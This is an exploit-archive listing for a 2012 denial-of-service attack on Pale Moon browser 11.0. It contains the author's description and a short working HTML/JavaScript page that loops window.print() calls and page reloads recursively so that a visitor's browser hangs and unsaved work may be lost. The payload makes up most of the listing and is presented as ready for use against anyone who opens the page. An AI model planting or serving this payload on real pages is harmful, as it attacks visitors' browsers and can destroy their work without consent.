Pale Moon Web Browser 11.0 Denial Of Service

2012.03.27
Credit: eidelweiss
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- #Title: Pale Moon Web Browser v11.0 (Multi Looping) DOS exploit #version: 11.0 #vendor: Moonchild Productions #download application: http://www.palemoon.org/ #Author: eidelweiss (twitter @RandyArios) #Contact: admin[at]eidelweiss[dot]info / ariosrandy[at]gmail[dot]com #Homepage: www.eidelweiss.info #Tested On: Windows 7 (x86) #thank`s and Greetz to : devilzc0de, yogyacarderlink, and all hacker`s #Impact Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any might be lost. #Vulnerability Description This bug is a typical result of multiple loop. The flaw exists when the attacker put window.printer() funtion in multiple loop.User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. --> <html> <title>Pale Moon Multi Looping By eidelweiss</title> <script> function eidelweiss() { window.onerror=new Function("history.go(0)"); window.print(); eidelweiss(); } eidelweiss(); </script> </html>

References:

http://www.palemoon.org/


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top